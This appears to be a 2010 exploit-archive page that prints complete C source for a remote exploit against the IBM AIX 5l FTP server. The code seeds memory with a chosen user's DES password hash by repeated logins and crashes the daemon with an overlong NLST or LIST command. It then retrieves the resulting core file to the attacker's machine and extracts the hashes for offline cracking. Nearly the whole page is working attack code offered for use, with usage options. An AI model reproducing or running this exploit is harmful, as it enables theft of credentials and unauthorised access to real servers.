IBM AIX 5l FTPd Remote DES Hash Exploit
Posted on 24 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>IBM AIX 5l FTPd Remote DES Hash Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================= IBM AIX 5l FTPd Remote DES Hash Exploit ======================================= /* * IBM AIX 5l FTPd Remote DES Hash Exploit -- Advanced 'Datacenter' Edition :> * * Should work on IBM AIX 5.1,5.2,5.3! probably on 4.X too * * bug found & exploited by Kingcope * * Version 2.0 - July 2010 * ---------------------------------------------------------------------------- * Description: - * The AIX 5l FTP-Server crashes when an overly long NLST command is supplied - * For example: NLST ~AAAAA...A (2000 A?s should be enough) - * The fun part here is that it creates a coredump file in the current - * directory if it is set writable by the logged in user. - * The goal of the exploit is to get the DES encrypted user hashes - * off the server. These can be later cracked with JtR. - * This is accomplished by populating the memory with logins of the user - * we would like the encrypted hash from. Logging in three times with the - * target username should be enough so that the DES hash is included in the - * 'core' file. - * The FTPd banner looks like below. - * 220 AIX5l FTP-Server (Version 4.1 Tue May 29 11:57:21 CDT 2001) ready. - * 220 AIX5l FTP server (Version 4.1 Wed Mar 2 15:52:50 CST 2005) ready. - * ---------------------------------------------------------------------------- */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <fcntl.h> int createconnection(char *target, char *targetport); void getline(int s); void putline(int s, char *out); void usage(char *exe); char in[8096]; char out[8096]; int main(int argc, char *argv[]) { extern int optind; extern char *optarg; int haveuser=0,havepassword=0; int s,s2,nsock; int c,k,len; int fd; char *target = NULL; char *username = "ftp"; char *password = "guest"; char *writeto = "pub"; char *crackme = "root"; char *targetport = "21"; int uselist = 0; char *myip = NULL; char *as = NULL; int octet_in[4], port; struct sockaddr_in yo, cli; char *oct = NULL; while ((c = getopt(argc, argv, "h:i:p:l:k:d:c:s")) != EOF) { switch(c) { case 'h': target = (char*)malloc(strlen(optarg)+1); strcpy(target, optarg); break; case 'i': myip = (char*)malloc(strlen(optarg)+1); strcpy(myip, optarg); break; case 'p': targetport = (char*)malloc(strlen(optarg)+1); strcpy(targetport, optarg); break; case 'l': username = (char*)malloc(strlen(optarg)+1); strcpy(username, optarg); haveuser = 1; break; case 'k': password = (char*)malloc(strlen(optarg)+1); strcpy(password, optarg); havepassword = 1; break; case 'd': writeto = (char*)malloc(strlen(optarg)+1); strcpy(writeto, optarg); break; case 'c': crackme = (char*)malloc(strlen(optarg)+1); strcpy(crackme, optarg); break; case 's': uselist = 1; break; default: usage(argv[0]); } } if (target == NULL || myip == NULL) usage(argv[0]); if ((haveuser && !havepassword) || (!haveuser && havepassword)) { usage(argv[0]); } s = createconnection(target, targetport); getline(s); fprintf(stderr, "populating DES hash in memory... "); for (k=0;k<3;k++) { snprintf(out, sizeof out, "USER %s ", crackme); putline(s, out); getline(s); snprintf(out, sizeof out, "PASS abcdef "); putline(s,out); getline(s); } fprintf(stderr, "logging in... "); snprintf(out, sizeof out, "USER %s ", username); putline(s, out); getline(s); snprintf(out, sizeof out, "PASS %s ", password); putline(s,out); getline(s); getline(s); fprintf(stderr, "changing directory... "); snprintf(out, sizeof out, "CWD %s ", writeto); putline(s, out); getline(s); fprintf(stderr, "triggering segmentation violation... "); as = (char*)malloc(2000); memset(as, 'A', 2000); as[2000-1]=0; if (!uselist) { snprintf(out, sizeof out, "NLST ~%s ", as); } else { /* AIX 5.3 trigger - thanks to karol */ snprintf(out, sizeof out, "LIST ~%s ", as); } putline(s, out); memset(in, '�', sizeof in); if (recv(s, in, sizeof in, 0) < 1) { printf("trigger succeeded! waiting for core file to be created... "); } else { printf("trigger seems to have failed, proceeding anyways... " " waiting for core file to be created... "); } sleep(5); close(s); s = createconnection(target, targetport); getline(s); fprintf(stderr, "logging in 2nd time... "); snprintf(out, sizeof out, "USER %s ", username); putline(s, out); getline(s); snprintf(out, sizeof out, "PASS %s ", password); putline(s,out); getline(s); getline(s); fprintf(stderr, "changing directory... "); snprintf(out, sizeof out, "CWD %s ", writeto); putline(s, out); getline(s); fprintf(stderr, "getting core file... "); snprintf(out, sizeof out, "TYPE I "); putline(s, out); getline(s); port = getpid() + 1024; len = sizeof(cli); bzero(&yo, sizeof(yo)); yo.sin_family = AF_INET; yo.sin_port=htons(port); yo.sin_addr.s_addr = htonl(INADDR_ANY); oct=(char *)strtok(myip,"."); octet_in[0]=atoi(oct); oct=(char *)strtok(NULL,"."); octet_in[1]=atoi(oct); oct=(char *)strtok(NULL,"."); octet_in[2]=atoi(oct); oct=(char *)strtok(NULL,"."); octet_in[3]=atoi(oct); snprintf(out, sizeof out, "PORT %d,%d,%d,%d,%d,%d ", octet_in[0], octet_in[1], octet_in[2], octet_in[3], port / 256, port % 256); putline(s, out); getline(s); if ((s2=socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket"); return -1; } if ((bind(s2, (struct sockaddr *) &yo, sizeof(yo))) < 0) { perror("bind"); close(s2); exit(1); } if (listen(s2, 10) < 0) { perror("listen"); close(s2); exit(1); } snprintf(out, sizeof out, "RETR core "); putline(s, out); getline(s); if (strstr(in, "150") == NULL) { fprintf(stderr, "core file not found... terminating. "); close(s); exit(1); } fd = open("core", O_WRONLY | O_CREAT); if (fd == -1) { perror("open on local core file"); close(s); exit(1); } sleep(1); if ((nsock = accept(s2, (struct sockaddr *)&cli, &len)) < 0) { perror("accept"); close(s); exit(1); } do { k = recv(nsock, in, sizeof in, 0); if (k < 1) break; write(fd, in, k); } while (k > 0); close(nsock); close(fd); close(s); fprintf(stderr, "finally extracting DES hashes from core file for user '%s'... ", crackme); system("strings core | grep '^[A-Za-z0-9]\{13\}$'"); fprintf(stderr, "done. "); return 0; } int createconnection(char *target, char *targetport) { struct addrinfo hints, *res; int s; memset(&hints, 0, sizeof hints); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_STREAM; if (getaddrinfo(target, targetport, &hints, &res)) { perror("getaddrinfo"); exit(1); } s = socket(res->ai_family, res->ai_socktype, res->ai_protocol); if (s < 0) { perror("socket"); exit(1); } if (connect(s, res->ai_addr, res->ai_addrlen) < 0) { perror("connect"); exit(1); } return s; } void getline(int s) { memset(in, '�', sizeof in); if (recv(s, in, sizeof in, 0) < 1) { perror("recv"); close(s); exit(1); } fprintf(stderr, "< %s", in); } void putline(int s, char *out) { fprintf(stderr, "> %s", out); if (send(s, out, strlen(out), 0) == -1) { perror("send"); close(s); exit(1); } } void usage(char *exe) { fprintf(stderr, "%s <-h host> <-i your internal ip> [-p port] [-l username] [-k password]" " [-d writable directory] [-c user to crack] [-s use 'LIST' command on AIX 5.3] ", exe); exit(0); } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-24]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
